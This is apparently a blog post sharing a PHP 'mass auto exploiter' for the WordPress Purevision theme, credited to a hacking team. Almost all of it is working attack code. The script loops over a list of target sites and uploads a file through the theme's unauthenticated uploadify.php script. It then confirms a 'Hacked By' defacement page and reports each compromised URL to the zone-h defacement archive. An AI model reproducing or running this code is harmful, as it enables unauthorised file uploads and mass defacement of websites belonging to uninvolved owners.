Wordpress Purevision Themes Auto Exploiter


#- Wordpress WP Purevision Themes Mass Exploiter
#- Coded By : Synchronizer
#- Team : Sanjungan Jiwa Team
#- Using this Tool >> php sync.php list.txt
#- Example >> Name.php = This file name | list.txt = your list target

------------------



Code:
<?php
# Wordpress WP Purevision Themes Mass Exploiter
# Coded By : Synchronizer
# Team : Sanjungan Jiwa Team
# Using this Exploit >> php sync.php list.txt
# Example >> Name.php = This file name | list.txt = your list target
# Thanks to : All Member Sanjungan Jiwa Team


@set_time_limit(0);
print"


#==============================================================#
# Wordpress Purevision Themes Mass & Auto Exploiter #
#--------------------------------------------------------------#
# Coded By Synchronizer #
# Merubah Copyright, tidak menjadikan anda seorang coder #
# WE ARESANJUNGAN JIWA TEAM #
#==============================================================#


";


echo "\n";

$get=file_get_contents($argv[1]);
$j=explode("\r\n",$get);
foreach($j as $site){
echo "\n\n\t[+] Exploiting => ".$site;


$uploadfile="x.txt"; #Your file (give text Hacked by Your Nickname)
$ch =curl_init($site.'/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",'folder'=>"/"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$sync = curl_exec($ch);
curl_close($ch);
$access = ($site).'/'.($uploadfile);
$f_sync=@file_get_contents($access);
if(eregi('Hacked By Synchronizer',$f_sync)){ #Edit this text as your Nick/text on your file x.txt
echo "\n\t[x]".'Success => '.$access."\n";
$ch = curl_init ("http://www.zone-h.com/notify/single");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, "defacer=./Synchronizer&domain1=http://$access&hackmode=1&reason=1");
if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch))){
echo "\n\t[x] Zone-h => Ok ". "\n\n";
}else{
echo "\n\t[x] Zone-h => No". "\n\n"; }
curl_close ($ch);
}else{
echo "\n\t[x] ".$site." => Exploiting Failed :( \n\n";


}
}
?>

0 Response to "Wordpress Purevision Themes Auto Exploiter"

Posting Komentar